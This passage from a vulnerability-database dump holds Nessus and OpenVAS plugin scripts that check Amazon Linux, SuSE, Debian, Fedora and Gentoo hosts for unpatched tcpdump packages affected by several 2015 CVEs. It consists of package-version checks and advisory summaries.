"published": "2015-07-08T00:00:00", "id": "ALA_ALAS-2015-557.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=84593", "title": "Amazon Linux AMI : tcpdump (ALAS-2015-557)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-557.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84593);\n script_version(\"2.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\");\n script_xref(name:\"ALAS\", value:\"2015-557\");\n\n script_name(english:\"Amazon Linux AMI : tcpdump (ALAS-2015-557)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer signedness error in the mobility_opt_print function in the\nIPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers\nto cause a denial of service (out-of-bounds read and crash) or\npossibly execute arbitrary code via a negative length value.\n(CVE-2015-0261)\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet\nprinter in tcpdump before 4.7.2 allows remote attackers to cause a\ndenial of service (out-of-bounds read and crash) via a crafted (1)\nlength, (2) offset, or (3) base pointer checksum value.\n(CVE-2015-2154)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-557.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update tcpdump' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / 
tcpdump-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:15", "bulletinFamily": "scanner", "description": "When running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities in protocol printers have been fixed :\n\n - IPv6 mobility printer remote DoS. (CVE-2015-0261,\n bnc#922220)\n\n - Ethernet printer remote DoS. (CVE-2015-2154, bnc#922222)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)", "modified": "2015-04-09T00:00:00", "published": "2015-04-09T00:00:00", "id": "SUSE_11_TCPDUMP-150320.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82658", "title": "SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10509)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82658);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/04/09 13:37:53 $\");\n\n script_cve_id(\"CVE-2014-9140\", \"CVE-2015-0261\", \"CVE-2015-2154\");\n\n script_name(english:\"SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10509)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"When running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities in protocol printers have been fixed :\n\n - IPv6 mobility printer remote DoS. (CVE-2015-0261,\n bnc#922220)\n\n - Ethernet printer remote DoS. 
(CVE-2015-2154, bnc#922222)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=922220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=922222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=923142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-9140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-0261.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2015-2154.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10509.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"tcpdump-3.9.8-1.27.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:07", "bulletinFamily": "scanner", "description": "Several issues have been discovered with tcpdump in the way it handled\nsome printer protocols. Those issues can lead to denial of service,\nor, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\nMissing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\nMissing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\nMissing bounds checks in ForCES printer\n\nThanks to Romain Françoise who prepared this update.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "modified": "2018-07-06T00:00:00", "published": "2015-03-26T00:00:00", "id": "DEBIAN_DLA-174.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82159", "title": "Debian DLA-174-1 : tcpdump security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-174-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82159);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/06 11:26:06\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73019, 73021);\n\n script_name(english:\"Debian DLA-174-1 : tcpdump security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered with tcpdump in the way it handled\nsome printer protocols. Those issues can lead to denial of service,\nor, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\nMissing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\nMissing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\nMissing bounds checks in ForCES printer\n\nThanks to Romain Françoise who prepared this update.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/03/msg00011.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/tcpdump\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"tcpdump\", 
reference:\"tcpdump_4.1.1-1+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-09-01T23:52:56", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-07-07T00:00:00", "id": "OPENVAS:1361412562310869600", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869600", "title": "Fedora Update for tcpdump FEDORA-2015-4804", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4804\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869600\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:26:25 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4804\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. 
Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 22\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4804\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153999.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:39:09", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201510-04", "modified": "2018-10-26T00:00:00", "published": "2015-11-08T00:00:00", "id": "OPENVAS:1361412562310121417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121417", "title": "Gentoo Security Advisory GLSA 201510-04", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen 
<eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121417\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-08 13:04:38 +0200 (Sun, 08 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in tcpdump. 
Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-04\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/tcpdump\", unaffected: make_list(\"ge 4.7.4\"), vulnerable: make_list(\"lt 4.7.4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:53:34", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. 
These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2015-03-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703193", "id": "OPENVAS:703193", "title": "Debian Security Advisory DSA 3193-1 (tcpdump - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3193.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3193-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703193);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_name(\"Debian Security Advisory DSA 3193-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-17 00:00:00 +0100 (Tue, 17 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3193.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump the\ntraffic on a network. 
tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:51:42", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. 
These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.", "modified": "2018-04-06T00:00:00", "published": "2015-03-17T00:00:00", "id": "OPENVAS:1361412562310703193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703193", "title": "Debian Security Advisory DSA 3193-1 (tcpdump - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3193.nasl 9355 2018-04-06 07:16:07Z cfischer $\n# Auto-generated from advisory DSA 3193-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703193\");\n script_version(\"$Revision: 9355 $\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_name(\"Debian Security Advisory DSA 3193-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:16:07 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-17 00:00:00 +0100 (Tue, 17 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3193.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump the\ntraffic on a network. 
tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service (application crash) or,\npotentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-19T13:01:08", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the 'tcpdump' package(s) announced via the referenced advisory.", "modified": "2018-11-16T00:00:00", "published": "2015-04-28T00:00:00", "id": "OPENVAS:1361412562310842179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842179", "title": "Ubuntu Update for tcpdump USN-2580-1", "type": "openvas", "sourceData": 